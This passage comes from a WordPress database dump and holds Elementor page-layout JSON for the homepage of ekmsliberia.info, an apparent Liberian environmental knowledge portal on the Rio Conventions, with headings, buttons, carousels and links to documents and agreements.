Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16906,2531,'_elementor_version','2.7.5'),(16907,2531,'_elementor_template_type','wp-page'),(16908,2531,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(16911,2532,'_wp_page_template','default'),(16912,2532,'_elementor_edit_mode','builder'),(16913,2532,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"au